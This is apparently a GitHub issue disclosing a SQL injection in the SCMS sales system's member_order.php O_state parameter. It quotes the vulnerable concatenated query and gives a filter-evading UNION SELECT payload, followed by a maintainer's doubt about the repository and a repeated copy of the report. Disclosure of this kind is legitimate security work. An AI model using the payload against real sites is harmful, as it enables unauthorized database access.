An issue was discovered in Sales & Company Management System (SCMS).It has SQL injection during order operation via the member/member_order.php O_state parameter.
In line 97
the parameter state was joined to sql statement $sql="select * from SL_orders,SL_product,SL_lv,SL_member where M_lv=L_id && O_member=M_id && O_pid=P_id && O_member=".$M_id." ".$state." order by O_id desc";
as for the parameter state,it comes from the line 12,while scms has been filtered some characters
It also cause sql injection 3/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,10,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69#
The text was updated successfully, but these errors were encountered:
@ParadiseCong Are you sure you filed this against the right repo? member_order.php does not appear to exist in this S-CMS. Perhaps you are testing Zibo S-CMS Enterprise Website System (企业建站系统) at https://www.s-cms.cn/download.html?code=php?
An issue was discovered in Sales & Company Management System (SCMS).It has SQL injection during order operation via the member/member_order.php O_state parameter.



In line 97
the parameter state was joined to sql statement
$sql="select * from SL_orders,SL_product,SL_lv,SL_member where M_lv=L_id && O_member=M_id && O_pid=P_id && O_member=".$M_id." ".$state." order by O_id desc";as for the parameter state,it comes from the line 12,while scms has been filtered some characters
It also cause sql injection
3/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,10,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69#The text was updated successfully, but these errors were encountered: